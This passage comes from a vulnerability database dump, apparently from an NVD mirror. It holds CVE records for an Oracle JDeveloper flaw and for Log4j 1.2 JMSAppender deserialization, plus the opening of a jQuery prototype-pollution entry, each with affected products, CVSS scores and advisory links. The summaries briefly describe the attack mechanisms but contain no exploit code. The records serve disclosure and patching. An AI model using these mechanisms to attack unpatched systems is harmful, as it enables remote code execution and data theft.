"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2018-01-18 02:29
Modified
2024-11-21 04:04
Severity ?
Summary
Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).
References
| ▼ | URL | Tags | |
|---|---|---|---|
| secalert_us@oracle.com | http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | Patch, Vendor Advisory | |
| secalert_us@oracle.com | http://www.securityfocus.com/bid/102539 | Third Party Advisory, VDB Entry | |
| secalert_us@oracle.com | http://www.securitytracker.com/id/1040207 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/102539 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securitytracker.com/id/1040207 | Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | jdeveloper | 11.1.1.2.4 | |
| oracle | jdeveloper | 11.1.1.7.0 | |
| oracle | jdeveloper | 11.1.1.7.1 | |
| oracle | jdeveloper | 11.1.1.9.0 | |
| oracle | jdeveloper | 12.1.3.0.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.2.4:*:*:*:*:*:*:*", matchCriteriaId: "610772EA-97C5-4062-83B7-7663517E76CE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "07EF593B-376C-4367-B9FB-1F429062576C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*", matchCriteriaId: "9E9124B7-0F2C-4018-B5B5-5BA659333933", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", }, { lang: "es", value: "Vulnerabilidad en el componente Oracle JDeveloper de Oracle Fusion Middleware (subcomponente: Security Framework). Las versiones soportadas que se han visto afectadas son la 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 y la 12.1.3.0.0. Una vulnerabilidad fácilmente explotable permite que un atacante sin autenticar con acceso a red por HTTP comprometa la seguridad de Oracle JDeveloper. Para que los ataques tengan éxito, se necesita la participación de otra persona diferente del atacante y, aunque la vulnerabilidad está presente en Oracle JDeveloper, los ataques podrían afectar seriamente a productos adicionales. Los ataques exitosos a esta vulnerabilidad pueden resultar en un acceso no autorizado a datos confidenciales o un acceso completo a todos los datos accesibles de Oracle JDeveloper; así como en el acceso no autorizado de actualización, inserción o eliminación de algunos de los datos accesibles de Oracle JDeveloper. CVSS 3.0 Base Score 8.2 (impactos de confidencialidad e integridad). Vector CVSS: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", }, ], id: "CVE-2018-2711", lastModified: "2024-11-21T04:04:18.257", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 5.8, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:N", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 4.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 8.2, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", version: "3.0", }, exploitabilityScore: 2.8, impactScore: 4.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-01-18T02:29:24.477", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/102539", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040207", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/102539", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040207", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2021-12-14 12:15
Modified
2024-11-21 06:36
Severity ?
Summary
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:1.2:*:*:*:*:*:*:*", matchCriteriaId: "2954BDA9-F03D-44AC-A9EA-3E89036EEFA8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", matchCriteriaId: "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:codeready_studio:12.0:*:*:*:*:*:*:*", matchCriteriaId: "1BAF877F-B8D5-4313-AC5C-26BB82006B30", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:integration_camel_k:-:*:*:*:*:*:*:*", matchCriteriaId: "B87C8AD3-8878-4546-86C2-BF411876648C", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:integration_camel_quarkus:-:*:*:*:*:*:*:*", matchCriteriaId: "F039C746-2001-4EE5-835F-49607A94F12B", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_a-mq:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "33C4404A-CFB7-4B47-9487-F998825C31CA", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_a-mq:7:*:*:*:*:*:*:*", matchCriteriaId: "A58966CB-36AF-4E64-AB39-BE3A0753E155", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_a-mq_streaming:-:*:*:*:*:*:*:*", matchCriteriaId: "8C7257E5-B4A7-4299-8FE1-A94121E47528", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_data_grid:7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "CD354E32-A8B0-484C-B4C6-9FBCD3430D2D", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_data_virtualization:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "5CDDAFDB-E67A-4795-B2C4-C2D31734ABC8", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B142ACCC-F7A9-4A3B-BE60-0D6691D5058D", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*", matchCriteriaId: "88BF3B2C-B121-483A-AEF2-8082F6DA5310", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_fuse:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A305F012-544E-4245-9D69-1C8CD37748B1", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_fuse:7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40CCE4F-EA2C-453D-BB76-6388767E5C6D", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_fuse_service_works:6.0:*:*:*:*:*:*:*", matchCriteriaId: "3B78438D-1321-4BF4-AEB1-DAF60D589530", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_operations_network:3.0:*:*:*:*:*:*:*", matchCriteriaId: "C077D692-150C-4AE9-8C0B-7A3EA5EB1100", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_web_server:3.0:*:*:*:*:*:*:*", matchCriteriaId: "54EB07A0-FB38-4F17-9C8D-DB629967F07B", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_application_runtimes:-:*:*:*:*:*:*:*", matchCriteriaId: "A33441B3-B301-426C-A976-08CE5FE72EFB", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:4.6:*:*:*:*:*:*:*", matchCriteriaId: "6B62E762-2878-455A-93C9-A5DB430D7BB5", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:4.7:*:*:*:*:*:*:*", matchCriteriaId: "14CF53D2-B585-4EA5-8F18-21BC9ECBB4B6", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:4.8:*:*:*:*:*:*:*", matchCriteriaId: "91B493F0-5542-49F7-AAAE-E6CA6E468D7B", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*", matchCriteriaId: "20A6B40D-F991-4712-8E30-5FE008505CB7", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*", matchCriteriaId: "749804DA-4B27-492A-9ABA-6BB562A6B3AC", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", matchCriteriaId: "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", matchCriteriaId: "142AD0DD-4CF3-4D74-9442-459CE3347E3A", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "F4CFF558-3C47-480D-A2F0-BABF26042943", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "A62E2A25-1AD7-4B4B-9D1B-F0DEA4550557", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "0331158C-BBE0-42DB-8180-EB1FCD290567", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "B602F9E8-1580-436C-A26D-6E6F8121A583", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "77C3DD16-1D81-40E1-B312-50FBD275507C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "81DAC8C0-D342-44B5-9432-6B88D389584F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "28CDCE04-B074-4D7A-B6E4-48193458C9A0", versionEndExcluding: "12.0.0.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.5.0:*:*:*:*:*:*:*", matchCriteriaId: "5933FEA2-B79E-4EE7-B821-54D676B45734", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.4:*:*:*:*:*:*:*", matchCriteriaId: "0D299528-8EF0-49AF-9BDE-4B6C6B1DA36C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*", matchCriteriaId: "17A91FD9-9F77-42D3-A4D9-48BC7568ADE1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:2.2.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6ED0EE39-C080-4E75-AE0F-3859B57EF851", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "054B56E0-F11B-4939-B7E1-E722C67A041A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "250A493C-E052-4978-ABBE-786DC8038448", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2E2B771B-230A-4811-94D7-065C2722E428", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_common_libraries_and_tools:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "F17531CB-DE8A-4ACD-93A0-6A5A8481D51B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:goldengate:-:*:*:*:*:*:*:*", matchCriteriaId: "507E7AEE-C2FC-4EED-B0F7-5E41642C0BF7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_data_repository:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "66C673C4-A825-46C0-816B-103E1C058D03", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:14.1.3.2:*:*:*:*:*:*:*", matchCriteriaId: "51E83F05-B691-4450-BCA9-32209AEC4F6A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:15.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "288235F9-2F9E-469A-BE14-9089D0782875", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "6672F9C1-DA04-47F1-B699-C171511ACE38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "11E57939-A543-44F7-942A-88690E39EABA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2.5:*:*:*:*:*:*:*", matchCriteriaId: "30501D23-5044-477A-8DC3-7610126AEFD7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:stream_analytics:-:*:*:*:*:*:*:*", matchCriteriaId: "0B45A731-11D1-433B-B202-9C8D67C609F9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:timesten_grid:-:*:*:*:*:*:*:*", matchCriteriaId: "900D9DBF-8071-4CE5-A67A-9E0C00D04B87", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB7D0A30-3986-49AB-B7F3-DAE0024504BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.1.1:*:*:*:*:*:*:*", matchCriteriaId: "A3ED272C-A545-4F8C-86C0-2736B3F2DCAF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.2.2:*:*:*:*:*:*:*", matchCriteriaId: "C5B4C338-11E1-4235-9D5A-960B2711AC39", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "8C93F84E-9680-44EF-8656-D27440B51698", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, { lang: "es", value: "JMSAppender en Log4j versión 1.2 es vulnerable a una deserialización de datos no confiables cuando el atacante presenta acceso de escritura a la configuración de Log4j. El atacante puede proporcionar configuraciones TopicBindingName y TopicConnectionFactoryBindingName haciendo que JMSAppender realice peticiones JNDI que resulten en la ejecución de código remota de forma similar a CVE-2021-44228. Tenga en cuenta que este problema sólo afecta a Log4j versión 1.2 cuando es configurado específicamente para usar JMSAppender, que no es el predeterminado. Apache Log4j versión 1.2 llegó al final de su vida útil en agosto de 2015. Los usuarios deberían actualizar a Log4j 2 ya que aborda otros numerosos problemas de las versiones anteriores", }, ], id: "CVE-2021-4104", lastModified: "2024-11-21T06:36:54.560", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "SINGLE", availabilityImpact: "PARTIAL", baseScore: 6, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:S/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 6.8, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 1.6, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2021-12-14T12:15:12.200", references: [ { source: "security@apache.org", url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { source: "security@apache.org", url: "https://access.redhat.com/security/cve/CVE-2021-4104", }, { source: "security@apache.org", url: "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", }, { source: "security@apache.org", url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033", }, { source: "security@apache.org", url: "https://security.gentoo.org/glsa/202209-02", }, { source: "security@apache.org", url: "https://security.gentoo.org/glsa/202310-16", }, { source: "security@apache.org", url: "https://security.gentoo.org/glsa/202312-02", }, { source: "security@apache.org", url: "https://security.gentoo.org/glsa/202312-04", }, { source: "security@apache.org", url: "https://security.netapp.com/advisory/ntap-20211223-0007/", }, { source: "security@apache.org", url: "https://www.cve.org/CVERecord?id=CVE-2021-44228", }, { source: "security@apache.org", url: "https://www.kb.cert.org/vuls/id/930724", }, { source: "security@apache.org", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "security@apache.org", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/security/cve/CVE-2021-4104", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.gentoo.org/glsa/202209-02", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.gentoo.org/glsa/202310-16", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.gentoo.org/glsa/202312-02", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.gentoo.org/glsa/202312-04", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.netapp.com/advisory/ntap-20211223-0007/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.cve.org/CVERecord?id=CVE-2021-44228", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.kb.cert.org/vuls/id/930724", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2019-04-20 00:29
Modified
2024-11-21 04:20
Severity ?
Summary
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
References
Impacted products
